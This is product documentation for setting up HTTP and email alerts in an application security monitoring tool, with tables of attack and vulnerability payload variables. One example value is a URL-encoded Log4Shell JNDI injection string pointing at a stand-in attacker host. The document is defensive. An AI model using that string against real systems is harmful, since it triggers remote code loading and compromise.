Alerts Using Secure Application

Create an HTTP Alert

The Alerts tab allows you to configure email and HTTP based alerts. You can set up actions to get alerted when Secure Application detects new attacks, vulnerabilities, or business risks.

Note: Only users with Edit (admin or tenant level) permission can access Alerts. An RBAC user with less privileges than admin or tenant level cannot create alerts.
  1. From the Secure Application dashboard, navigate to Alerts.
  2. From the HTTP tab, click + Add Action.
  3. Enter the Action Name.
    Do not use special characters in the Action Name.
  4. Select the Event Type: Vulnerability, Business Risk, or Attack.
  5. Click Next.
  6. Enter the following Action Details:
    1. Method Type: POST
    2. Encoding: UTF-8
    3. (Optional) Applications: Select up to 100 applications that this action applies to from the pull-down list. You can filter the list by typing into it. By default, this action applies to all applications.
    4. Raw URL: Enter the Raw URL of your HTTP request.
  7. Click Next.
  8. For Authentication Type select:
    1. None, if the communication is not encrypted
    2. Basic, and enter your username and password
    3. Bearer Token, and enter your token
  9. Click Next.
  10. Optional: (Optional) Specify custom headers for the request.
  11. Click Next.
  12. Click Add Payload.

    The payload must be valid JSON. You can copy Predefined Variables, and paste the variables in the Editor. For example, if you select Attack as the Event Type, then you can select variable related to attack events when you click Add Payload.

    Attack variables:

    Field Description Example value
    $attack.id Unique identifier for the attack "SQL_INJECTION_001"
    $attack.status Current status of the attack "ACTIVE", "RESOLVED", "INVESTIGATING"
    $attack.source Source or origin of the attack "External", "Internal", "Unknown"
    $attack.outcome Result or outcome of the attack "BLOCKED", "ALLOWED", "PARTIALLY_BLOCKED"
    $attack.types Type(s) of attack detected "SQL Injection", "XSS", "CSRF"
    $attack.eventTrigger Event that triggered the attack detection "HTTP Request", "Database Query"
    $attack.lastDetected Timestamp when the attack was last detected "2023-10-15T14:30:00Z"
    $attack.events Detailed events associated with the attack. See the Attack Events table below for details. JSON array of attack events

    $attack.events contains the following key fields:

    Field Description Example value
    $attack.events.eventType Type of activity detected during the attack "SOCKET_RESOLVE"
    $attack.events.attackType Specific attack category detected "LOG4J"
    $attack.events.timestamp When the attack event occurred "2025-01-22T23:03:52Z"
    $attack.events.applicationName Application which was affected by the attack "ExpoitsTestApp"
    $attack.events.tierName Tier which was affected by the attack "ExpoitsTestTier"
    $attack.events.blocked Indicates if the attack was blocked "true", "false"
    $attack.events.attackOutcome Outcome of the event "EXPLOITED", "ATTEMPTED", "BLOCKED", "OBSERVED", "UNKNOWN"
    $attack.events.stackTrace Stack trace where the attack originated "java.lang.SecurityManager.checkConnect(...)"
    $attack.events.clientAddress IP address of the client initiating the request "127.11.11.1"
    $attack.events.clientPort Port used by the client "40758"
    $attack.events.serverAddress IP address of the server handling the request "127.12.12.1"
    $attack.events.serverPort Port used by the server "8088"
    $attack.events.webTransactionUrl Full URL involved in the exploit attempt "https://vulnerable.app.com/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious.attacker.com%2Fa%7D"
    $attack.events.maliciousIpOut Outbound IP address contacted during the event "192.0.2.123"
    $attack.events.maliciousIpSourceOut Source of malicious IP match, if any "10.1.2.45"
    $attack.events.detailJson Structured technical metadata (e.g., class, socket, method) {"classname": "java.net.SocketPermission", ...}

    If the attack event is caused by a vulnerability, $attack.events may contain the following additional fields:

    Table 1. Vulnerability-Related Attack Event Fields
    Field Description Example value
    $attack.events.vulnerableMethod Method where the vulnerability was triggered "org.apache.logging.log4j.core.lookup.JndiLookup.lookup(Thread.java:234)"
    $attack.events.matchedCveName Name of the matched CVE "CVE-2021-44228"
    $attack.events.cveId Internal identifier for the matched CVE
    $attack.events.vulnerabilityInfo.cvePublishDate CVE publish date "2021-12-10T10:10:01Z"
    $attack.events.vulnerabilityInfo.cvssScore CVSS risk score (0–10) 10
    $attack.events.vulnerabilityInfo.cvssSeverity Severity level according to CVSS "CRITICAL"
    $attack.events.vulnerabilityInfo.library Vulnerable library involved "org.apache.logging.log4j:log4j-core"
    $attack.events.vulnerabilityInfo.title Human-readable description of the vulnerability "Remote Code Execution (RCE)"
    $attack.events.vulnerabilityInfo.kennaScore Risk score from Kenna Security 100
    $attack.events.vulnerabilityInfo.kennaActiveInternetBreach Whether the vuln is known to be actively exploited true, false
    $attack.events.vulnerabilityInfo.kennaEasilyExploitable Whether the vuln is easy to exploit true, false
    $attack.events.vulnerabilityInfo.kennaPredictedExploitable Predictive model’s assessment of exploitability true, false
    $attack.events.vulnerabilityInfo.kennaPopularTarget Whether this is a popular target across orgs true, false
    Tip:

    Select the predefined variable $attack.events to include details related to any vulnerability associated with the attack in the payload.

    Select the predefined variable $attack.events to include up to 256 lines of the stack trace in the payload.

  13. Confirm and review the following information: cURL,General Information,Actions,Security,Custom Headers, and Payload.
    Sample payload for ServiceNow:

    Sample action that applies only to a few applications:

  14. Click Save.
Once you click Save, default Rules are automatically generated. To see the rules, click the Rule tab. If you specified which applications this action applies to, those applications are listed on the Rules tab in the Application column.

Create an Email Alert

You can also view <= 100 vulnerabilities, business risks, or attacks per email notification. To view > 100 vulnerabilities, business risks, or attacks, sign in to the UI.

  1. From the Secure Application dashboard, navigate to Alerts.
  2. Click the Email tab, then click + Add Action.
  3. Enter the Action Name. Do not use special characters in the Action Name.
  4. Select the Event Type: Vulnerability, Business Risk, or Attack.
  5. Click Next.
  6. Enter following Action Details:
    1. Optional: Select Notify directly in case of an exploited attack, if you would like to receive email alerts for exploited attacks.
    2. Email
    3. Email Digest
  7. Click Next.
  8. Select fields to report and click Next.
  9. Confirm and review the following information:General Information, Actions, Fields.
  10. Click Save.
Once you click Save, default Rules are automatically generated.